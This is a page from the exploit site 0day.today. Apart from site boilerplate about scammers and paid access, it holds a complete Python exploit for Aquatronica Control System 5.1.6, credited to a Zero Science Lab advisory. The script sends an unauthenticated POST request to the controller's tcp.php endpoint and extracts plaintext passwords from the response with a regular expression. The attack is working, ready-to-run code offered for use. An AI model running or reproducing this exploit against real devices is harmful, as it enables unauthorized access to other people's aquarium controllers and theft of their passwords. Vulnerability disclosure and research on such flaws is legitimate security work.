0day.today - 最大、世界でのデータベースを利用します。
あなたは0day.today について知っておくべきこと:
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります 金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Aquatronica Control System 5.1.6 Password Disclosure Exploit
#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability # # # Vendor: Aquatronica s.r.l. # Product web page: https://www.aquatronica.com # Affected version: Firmware: 5.1.6 # Web: 2.0 # # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy # to use, allowing you to control all the electrical devices in # an aquarium and to monitor all their parameters; it can be used # for soft water aquariums, salt water aquariums or both simultaneously. # # Desc: The tcp.php endpoint on the Aquatronica controller is exposed # to unauthenticated attackers over the network. This vulnerability # allows remote attackers to send a POST request which can reveal # sensitive configuration information, including plaintext passwords. # This can lead to unauthorized access and control over the aquarium # controller, compromising its security and potentially allowing attackers # to manipulate its settings. # # Tested on: Apache/2.0.54 (Unix) # PHP/5.4.17 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5824 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php # # # 04.05.2024 # import requests, html, re, sys, time from urllib.parse import unquote program = "TCP" command = "ws_get_network_cfg" function_id = "TCP_XML_REQUEST" print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \. | / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """) if len(sys.argv) != 2: print("Usage: python aqua.py <ip:port>") sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/{program.lower()}.php" post_data = {'function_id' : function_id.lower(), 'command' : command.upper()} r = requests.post(url, data=post_data) if r.status_code == 200: r_d = unquote(r.text) f_d_r = html.unescape(r_d) regex = r'pwd="([^"]+)"' rain = re.findall(regex, f_d_r) for drops in rain: print(' ',drops) time.sleep(0.5) else: print(f"Dry season! {r.status_code}") # 0day.today [2024-07-01] #